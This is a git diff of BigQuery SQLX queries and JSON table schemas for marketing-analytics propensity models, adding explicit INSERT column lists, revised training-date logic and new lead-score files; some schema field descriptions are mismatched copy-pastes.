lifetime_first_time_purchasers, + lifetime_first_time_purchaser_conversion, + lifetime_first_time_purchasers_per_new_user, + lifetime_avg_user_conversion_rate, + lifetime_avg_session_conversion_rate +) SELECT -- Records the current timestamp when the query is executed. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_scoped_metrics.sqlx b/sql/query/invoke_backfill_user_scoped_metrics.sqlx index 3cc45b49..c5252519 100644 --- a/sql/query/invoke_backfill_user_scoped_metrics.sqlx +++ b/sql/query/invoke_backfill_user_scoped_metrics.sqlx @@ -183,7 +183,35 @@ CREATE OR REPLACE TEMP TABLE new_users_ as ( ); -- Insert data into the target table after calculating various user engagement and revenue metrics. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + purchasers_users, + average_daily_purchasers, + active_users, + DAU, + MAU, + WAU, + dau_per_mau, + dau_per_wau, + wau_per_mau, + users_engagement_duration_seconds, + average_engagement_time, + average_engagement_time_per_session, + average_sessions_per_user, + ARPPU, + ARPU, + average_daily_revenue, + max_daily_revenue, + min_daily_revenue, + new_users, + returning_users, + first_time_purchasers, + first_time_purchaser_conversion, + first_time_purchasers_per_new_user, + avg_user_conversion_rate, + avg_session_conversion_rate +) SELECT DISTINCT -- Record the current timestamp when the query is executed. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx b/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx index c6f03aaa..251dfead 100644 --- a/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx +++ b/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx @@ -136,7 +136,35 @@ GROUP BY feature_date ); -- This SQL code calculates various user engagement and revenue metrics at a daily level and inserts the results into a target table. It leverages several temporary tables created earlier in the script to aggregate data efficiently. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + purchasers_users, + average_daily_purchasers, + active_users, + DAU, + MAU, + WAU, + dau_per_mau, + dau_per_wau, + wau_per_mau, + users_engagement_duration_seconds, + average_engagement_time, + average_engagement_time_per_session, + average_sessions_per_user, + ARPPU, + ARPU, + average_daily_revenue, + max_daily_revenue, + min_daily_revenue, + new_users, + returning_users, + first_time_purchasers, + first_time_purchaser_conversion, + first_time_purchasers_per_new_user, + avg_user_conversion_rate, + avg_session_conversion_rate +) SELECT -- Records the current timestamp when the query is executed. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx b/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx index be402415..cf2dc7ff 100644 --- a/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx +++ b/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx @@ -95,7 +95,31 @@ CREATE OR REPLACE TEMP TABLE events_users as ( -- This code snippet performs a complex aggregation and insertion operation. It combines data from two temporary tables, -- calculates various user-level dimensions, and inserts the aggregated results into a target table. The use of window functions, -- approximate aggregation, and careful joining ensures that the query is efficient and produces meaningful insights from the data. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id +) -- The DISTINCT keyword ensures that only unique rows are inserted, eliminating any potential duplicates. SELECT DISTINCT CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx b/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx index 7ba0e2f7..4c6f3373 100644 --- a/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx +++ b/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx @@ -354,7 +354,45 @@ CREATE OR REPLACE TEMP TABLE events_users_days as ( -- user_events_per_day_event_scoped (UEPDES): Contains user-level event metrics aggregated on a daily basis. Metrics include add_to_carts, cart_to_view_rate, checkouts, ecommerce_purchases, etc. -- repeated_purchase (R): Stores information about whether a user has made previous purchases, indicated by the how_many_purchased_before column. -- cart_to_purchase (CP): Contains a flag (has_abandoned_cart) indicating whether a user abandoned their cart on a given day. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + engagement_rate, + engaged_sessions_per_user, + session_conversion_rate, + bounces, + bounce_rate_per_user, + sessions_per_user, + avg_views_per_session, + sum_engagement_time_seconds, + avg_engagement_time_seconds, + new_visits, + returning_visits, + add_to_carts, + cart_to_view_rate, + checkouts, + ecommerce_purchases, + ecommerce_quantity, + ecommerce_revenue, + item_revenue, + item_quantity, + item_refund_amount, + item_view_events, + items_clicked_in_promotion, + items_clicked_in_list, + items_checked_out, + items_added_to_cart, + item_list_click_events, + item_list_view_events, + purchase_revenue, + purchase_to_view_rate, + refunds, + transactions_per_purchaser, + user_conversion_rate, + how_many_purchased_before, + has_abandoned_cart +) SELECT CURRENT_TIMESTAMP() AS processed_timestamp, EUD.feature_date, diff --git a/sql/query/invoke_churn_propensity_training_preparation.sqlx b/sql/query/invoke_churn_propensity_training_preparation.sqlx index 632fb03b..10a48ef4 100644 --- a/sql/query/invoke_churn_propensity_training_preparation.sqlx +++ b/sql/query/invoke_churn_propensity_training_preparation.sqlx @@ -57,14 +57,14 @@ SET churners = (SELECT COUNT(DISTINCT user_pseudo_id) ); -- Setting Training Dates --- If there are churners in the training set, then keep the user-defined dates, or else set --- the start and end dates instead. +-- If there are churners in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. IF churners > 0 THEN - SET train_start_date = GREATEST(train_start_date, min_date); - SET train_end_date = LEAST(train_end_date, max_date); -ELSE SET train_start_date = min_date; SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); END IF; -- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. diff --git a/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx b/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx index 597dcac8..cfbad806 100644 --- a/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx +++ b/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx @@ -54,17 +54,18 @@ SET validation_split_end_number = {{validation_split_end_number}}; -- IF there are no users in the time interval selected, then set "train_start_date" and "train_end_date" as "max_date" and "min_date". SET purchasers = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{mds_project_id}}.{{mds_dataset}}.event` - WHERE event_date BETWEEN train_start_date AND train_end_date + WHERE event_date BETWEEN min_date AND max_date ); --- If there are purchasers no changes to the train_start_date and train_end_date --- Else, expand the interval, hopefully a purchaser will be in the interval +-- Setting Training Dates +-- If there are churners in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. IF purchasers > 0 THEN - SET train_start_date = train_start_date; - SET train_end_date = train_end_date; -ELSE SET train_start_date = min_date; SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); END IF; -- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. This stored procedure likely handles the actual data preparation for the model. diff --git a/sql/query/invoke_lead_score_propensity_inference_preparation.sqlx b/sql/query/invoke_lead_score_propensity_inference_preparation.sqlx new file mode 100644 index 00000000..54e937d7 --- /dev/null +++ b/sql/query/invoke_lead_score_propensity_inference_preparation.sqlx @@ -0,0 +1,23 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script determines the current date and then passes it as an argument to a +-- stored procedure in your BigQuery project. This pattern is commonly used when +-- you want a stored procedure to perform operations or calculations that are +-- relevant to the current date, such as data processing, analysis, or reporting tasks. + +DECLARE inference_date DATE DEFAULT NULL; +SET inference_date = CURRENT_DATE(); + +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(inference_date); diff --git a/sql/query/invoke_lead_score_propensity_label.sqlx b/sql/query/invoke_lead_score_propensity_label.sqlx new file mode 100644 index 00000000..f4288278 --- /dev/null +++ b/sql/query/invoke_lead_score_propensity_label.sqlx @@ -0,0 +1,39 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script sets up a date range, calls a stored procedure with this range and a variable to +-- store a result, and then returns the result of the stored procedure. This pattern is common +-- for orchestrating data processing tasks within BigQuery using stored procedures. + +DECLARE input_date DATE; +DECLARE end_date DATE; +DECLARE users_added INT64 DEFAULT NULL; + +SET end_date= CURRENT_DATE(); +SET input_date= (SELECT DATE_SUB(end_date, INTERVAL {{interval_input_date}} DAY)); + +-- This code block ensures that the end_date used in subsequent operations is not later than one day after the latest available data in +-- the specified events table. This prevents potential attempts to process data for a date range that extends beyond the actual data availability. +IF (SELECT DATE_SUB(end_date, INTERVAL 1 DAY)) > (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET end_date = (SELECT DATE_ADD(MAX(event_date), INTERVAL 1 DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This code block ensures that the input_date used in subsequent operations is not before the earliest available data in the +-- specified events table. This prevents potential errors or unexpected behavior that might occur when trying to process data +-- for a date range that precedes the actual data availability. +IF input_date < (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET input_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL 1 DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(input_date, end_date, users_added); \ No newline at end of file diff --git a/sql/query/invoke_lead_score_propensity_training_preparation.sqlx b/sql/query/invoke_lead_score_propensity_training_preparation.sqlx new file mode 100644 index 00000000..3d515348 --- /dev/null +++ b/sql/query/invoke_lead_score_propensity_training_preparation.sqlx @@ -0,0 +1,73 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script intelligently determines the optimal date range for training a purchase +-- propensity model by considering user-defined parameters and the availability of purchase +-- events within the dataset. It ensures that the training data includes purchase events if +-- they exist within the specified bounds. + +-- Intended start and end dates for training data +-- Initializing Training Dates +DECLARE train_start_date DATE DEFAULT NULL; +DECLARE train_end_date DATE DEFAULT NULL; + +-- Control data splitting for training and validation (likely used in a subsequent process). +DECLARE train_split_end_number INT64 DEFAULT NULL; +DECLARE validation_split_end_number INT64 DEFAULT NULL; + +-- Will store the count of distinct users who made a {{target_event}} within a given period. +DECLARE {{target_event}}_users INT64 DEFAULT NULL; + +-- Used to store the maximum and minimum event dates from the source data. +DECLARE max_date DATE; +DECLARE min_date DATE; + +-- Determining Maximum and Minimum Dates +SET max_date = (SELECT DATE_SUB(MAX(event_date), INTERVAL {{interval_max_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +SET min_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL {{interval_min_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + +-- If min_date > maximum event_date OR max_date < minimum event_date, then set min_date for the min event_date and set max_date for the max event_date +IF min_date >= (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR max_date <= (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date >= max_date THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- Setting Split Numbers +-- Sets the train_split_end_number to a user-defined value. This value likely determines the proportion of data used for training. +SET train_split_end_number = {{train_split_end_number}}; -- If you want 60% for training use number 5. If you want 80% use number 7. +-- Sets the validation_split_end_number to a user-defined value, controlling the proportion of data used for validation. +SET validation_split_end_number = {{validation_split_end_number}}; + +-- This crucial step counts distinct users who have an event named '{{target_event}}' within the initially set training date range. +-- IF there are no users with {{target_event}} event in the time interval selected, then set "train_start_date" and "train_end_date" as "max_date" and "min_date". +SET {{target_event}}_users = (SELECT COUNT(DISTINCT user_pseudo_id) + FROM `{{mds_project_id}}.{{mds_dataset}}.event` + WHERE event_name = '{{target_event}}' AND + event_date BETWEEN min_date AND max_date + ); + +-- Setting Training Dates +-- If there are {{target_event}}_users in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. +IF {{target_event}}_users > 0 THEN + SET train_start_date = min_date; + SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); +END IF; + +-- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. This stored procedure +-- handles the actual data preparation for the lead score propensity model. +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(train_start_date, train_end_date, train_split_end_number, validation_split_end_number); diff --git a/sql/query/invoke_purchase_propensity_training_preparation.sqlx b/sql/query/invoke_purchase_propensity_training_preparation.sqlx index 4d2eab86..b8738465 100644 --- a/sql/query/invoke_purchase_propensity_training_preparation.sqlx +++ b/sql/query/invoke_purchase_propensity_training_preparation.sqlx @@ -54,17 +54,18 @@ SET validation_split_end_number = {{validation_split_end_number}}; SET purchasers = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{mds_project_id}}.{{mds_dataset}}.event` WHERE event_name = 'purchase' AND - event_date BETWEEN train_start_date AND train_end_date + event_date BETWEEN min_date AND max_date ); --- If there are purchasers no changes to the train_start_date and train_end_date --- Else, expand the interval, hopefully a purchaser will be in the interval +-- Setting Training Dates +-- If there are purchasers in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. IF purchasers > 0 THEN - SET train_start_date = GREATEST(train_start_date, min_date); - SET train_end_date = LEAST(train_end_date, max_date); -ELSE SET train_start_date = min_date; SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); END IF; -- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. This stored procedure diff --git a/sql/query/invoke_user_rolling_window_lead_metrics.sqlx b/sql/query/invoke_user_rolling_window_lead_metrics.sqlx new file mode 100644 index 00000000..e469a2d7 --- /dev/null +++ b/sql/query/invoke_user_rolling_window_lead_metrics.sqlx @@ -0,0 +1,28 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script sets up a date range, calls a stored procedure with this range and a variable to +-- store a result, and then returns the result of the stored procedure. This pattern is common +-- for orchestrating data processing tasks within BigQuery using stored procedures. + +DECLARE input_date DATE; +DECLARE end_date DATE; +DECLARE users_added INT64 DEFAULT NULL; + +SET input_date= CURRENT_DATE(); +SET end_date= (SELECT DATE_SUB(input_date, INTERVAL {{interval_end_date}} DAY)); + +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(input_date, end_date, users_added); + +SELECT users_added; \ No newline at end of file diff --git a/sql/schema/table/lead_score_propensity_inference_preparation.json b/sql/schema/table/lead_score_propensity_inference_preparation.json new file mode 100644 index 00000000..5fc9e6ec --- /dev/null +++ b/sql/schema/table/lead_score_propensity_inference_preparation.json @@ -0,0 +1,337 @@ +[ + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "user_id", + "type": "STRING", + "description": "The user identifier when the user is logged in" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "Date that serves as the basis for the calculation of the features" + }, + { + "name": "user_ltv_revenue", + "type": "FLOAT", + "description": "The current customer lifetime value revenue of the user" + }, + { + "name": "device_category", + "type": "STRING", + "description": "The device category the user last accessed" + }, + { + "name": "device_mobile_brand_name", + "type": "STRING", + "description": "The device mobile brand name the user last accessed" + }, + { + "name": "device_mobile_model_name", + "type": "STRING", + "description": "The device mobile model name the user last accessed" + }, + { + "name": "device_os", + "type": "STRING", + "description": "The device operating system the user last accessed" + }, + { + "name": "device_language", + "type": "STRING", + "description": "The device language the user last accessed" + }, + { + "name": "device_web_browser", + "type": "STRING", + "description": "The device web browser the user last accessed" + }, + { + "name": "geo_sub_continent", + "type": "STRING", + "description": "The geographic subcontinent the user last accessed from" + }, + { + "name": "geo_country", + "type": "STRING", + "description": "The geographic country the user last accessed from" + }, + { + "name": "geo_region", + "type": "STRING", + "description": "The geographic region the user last accessed from" + }, + { + "name": "geo_city", + "type": "STRING", + "description": "The geographic city the user last accessed from" + }, + { + "name": "geo_metro", + "type": "STRING", + "description": "The geographic metropolitan area the user last accessed from" + }, + { + "name": "last_traffic_source_medium", + "type": "STRING", + "description": "The last traffic source medium the user has been acquired" + }, + { + "name": "last_traffic_source_name", + "type": "STRING", + "description": "The last traffic source name the user has been acquired" + }, + { + "name": "last_traffic_source_source", + "type": "STRING", + "description": "The last traffic source source the user has been acquired" + }, + { + "name": "first_traffic_source_medium", + "type": "STRING", + "description": "The first traffic source medium the user has been acquired" + }, + { + "name": "first_traffic_source_name", + "type": "STRING", + "description": "The first traffic source name the user has been acquired" + }, + { + "name": "first_traffic_source_source", + "type": "STRING", + "description": "The first traffic source source the user has been acquired" + }, + { + "name": "has_signed_in_with_user_id", + "type": "BOOLEAN", + "description": "A boolean indicating whether the user has signed in with an user id" + }, + { + "name": "scroll_50_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 1 day" + }, + { + "name": "scroll_50_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 2nd day" + }, + { + "name": "scroll_50_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 3rd day" + }, + { + "name": "scroll_50_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 4th day" + }, + { + "name": "scroll_50_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 5th day" + }, + { + "name": "scroll_90_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past day" + }, + { + "name": "scroll_90_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 2nd day" + }, + { + "name": "scroll_90_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 3rd day" + }, + { + "name": "scroll_90_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 4th day" + }, + { + "name": "scroll_90_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 5th day" + }, + { + "name": "view_search_results_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "view_search_results_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "view_search_results_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "view_search_results_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "view_search_results_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "file_download_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "file_download_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "file_download_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "file_download_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "file_download_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "recipe_add_to_list_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past day" + }, + { + "name": "recipe_add_to_list_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 2nd day" + }, + { + "name": "recipe_add_to_list_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 3rd day" + }, + { + "name": "recipe_add_to_list_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 4th day" + }, + { + "name": "recipe_add_to_list_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 5th day" + }, + { + "name": "recipe_print_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past day" + }, + { + "name": "recipe_print_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 2nd day" + }, + { + "name": "recipe_print_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 3rd day" + }, + { + "name": "recipe_print_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 4th day" + }, + { + "name": "recipe_print_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 5th day" + }, + { + "name": "sign_up_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "sign_up_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "sign_up_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "sign_up_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "sign_up_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_favorite_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_favorite_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_favorite_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_favorite_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_favorite_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_add_to_menu_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_add_to_menu_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_add_to_menu_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_add_to_menu_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_add_to_menu_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + } +] \ No newline at end of file diff --git a/sql/schema/table/lead_score_propensity_label.json b/sql/schema/table/lead_score_propensity_label.json new file mode 100644 index 00000000..8b63bc6f --- /dev/null +++ b/sql/schema/table/lead_score_propensity_label.json @@ -0,0 +1,22 @@ +[ + { + "name": "processed_timestamp", + "type": "TIMESTAMP", + "description": "Timestamp of when the data was processed" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "The date serving as basis for the features calculation" + }, + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "login_day_1", + "type": "INTEGER", + "description": "Predicted number of logins by the user in the next 1st day from the feature date" + } +] \ No newline at end of file diff --git a/sql/schema/table/lead_score_propensity_training_preparation.json b/sql/schema/table/lead_score_propensity_training_preparation.json new file mode 100644 index 00000000..f5647417 --- /dev/null +++ b/sql/schema/table/lead_score_propensity_training_preparation.json @@ -0,0 +1,352 @@ +[ + { + "name": "processed_timestamp", + "type": "TIMESTAMP", + "description": "Timestamp of when the data was processed" + }, + { + "name": "data_split", + "type": "STRING", + "description": "The indication of whether the row should be used for TRAINING, VALIDATION or TESTING" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "The date serving as basis for the features calculation" + }, + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "user_id", + "type": "STRING", + "description": "The user identifier of when the user has logged in" + }, + { + "name": "user_ltv_revenue", + "type": "FLOAT", + "description": "The current user lifetime value" + }, + { + "name": "device_category", + "type": "STRING", + "description": "The device category of the user last used to access" + }, + { + "name": "device_mobile_brand_name", + "type": "STRING", + "description": "The device mobile brand name last used by the user" + }, + { + "name": "device_mobile_model_name", + "type": "STRING", + "description": "The device mobile model name last used by the user" + }, + { + "name": "device_os", + "type": "STRING", + "description": "The device operating system last used by the user" + }, + { + "name": "device_language", + "type": "STRING", + "description": "The device language last used by the user" + }, + { + "name": "device_web_browser", + "type": "STRING", + "description": "The device web browser last used by the user" + }, + { + "name": "geo_sub_continent", + "type": "STRING", + "description": "The geographic subcontinent from the user last access" + }, + { + "name": "geo_country", + "type": "STRING", + "description": "The geographic country from the user last access" + }, + { + "name": "geo_region", + "type": "STRING", + "description": "The geographic region from the user last access" + }, + { + "name": "geo_city", + "type": "STRING", + "description": "The geographic city from the user last access" + }, + { + "name": "geo_metro", + "type": "STRING", + "description": "The geographic metropolitan area from the user user last access" + }, + { + "name": "last_traffic_source_medium", + "type": "STRING", + "description": "The last traffic source medium from where the user was acquired" + }, + { + "name": "last_traffic_source_name", + "type": "STRING", + "description": "The last traffic source name from where the user was acquired" + }, + { + "name": "last_traffic_source_source", + "type": "STRING", + "description": "The last traffic source soure from where the user was acquired" + }, + { + "name": "first_traffic_source_medium", + "type": "STRING", + "description": "The first traffic source medium from where the user was acquired" + }, + { + "name": "first_traffic_source_name", + "type": "STRING", + "description": "The first traffic source name from where the user was acquired" + }, + { + "name": "first_traffic_source_source", + "type": "STRING", + "description": "The first traffic source source from where the user was acquired" + }, + { + "name": "has_signed_in_with_user_id", + "type": "BOOLEAN", + "description": "A boolean indicating whether the user has signed in with the user id" + }, + { + "name": "scroll_50_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 1 day" + }, + { + "name": "scroll_50_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 2nd day" + }, + { + "name": "scroll_50_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 3rd day" + }, + { + "name": "scroll_50_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 4th day" + }, + { + "name": "scroll_50_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 5th day" + }, + { + "name": "scroll_90_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past day" + }, + { + "name": "scroll_90_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 2nd day" + }, + { + "name": "scroll_90_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 3rd day" + }, + { + "name": "scroll_90_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 4th day" + }, + { + "name": "scroll_90_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 5th day" + }, + { + "name": "view_search_results_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "view_search_results_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "view_search_results_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "view_search_results_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "view_search_results_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": 